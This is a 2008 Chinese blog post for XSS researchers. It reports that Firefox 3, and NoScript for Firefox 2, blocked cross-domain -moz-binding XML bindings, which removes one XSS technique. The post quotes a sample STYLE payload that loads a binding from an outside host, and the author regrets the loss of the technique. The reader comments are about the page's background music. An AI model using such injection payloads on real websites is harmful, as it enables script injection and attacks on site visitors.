百度空间 | 百度首页 
 
查看文章
 
为跨站师带来一个不好的消息
2008-07-16 17:03

在firefox中,一直被用做style里进行xss的

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

在ff3中被remove了,这个url后面的xml类似于ie里的htc文件,已经不能跨域了,而在ff2中,noscript学习了ff3这个特性,也进行了类似的处理.以后在firefox里的xss又少一个利用的地方了

jno又说了一个好消息,这个xml不像htc那样限制后缀名,但是这个好消息跟上面这个坏消息比也算不了什么好消息啊.....也许有饶过的方法,但是既然firefox想修复这个,那么估计存活时间都不会太长.

日.


类别:默认分类 | 添加到搜藏 | 浏览() | 评论 (5)
 
最近读者:
 
网友评论:
1
2008-07-17 01:51 | 回复
我是来听背景歌曲的~
 
2
2008-07-17 22:12 | 回复
感动啊~楼上的~终于有人听这雷歌咯~
 
3
2008-07-19 11:00 | 回复
被雷~~
 
4
2008-07-19 13:59 | 回复
换歌咯 :)
 
5
2008-07-19 21:52 | 回复
路过顶歌
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu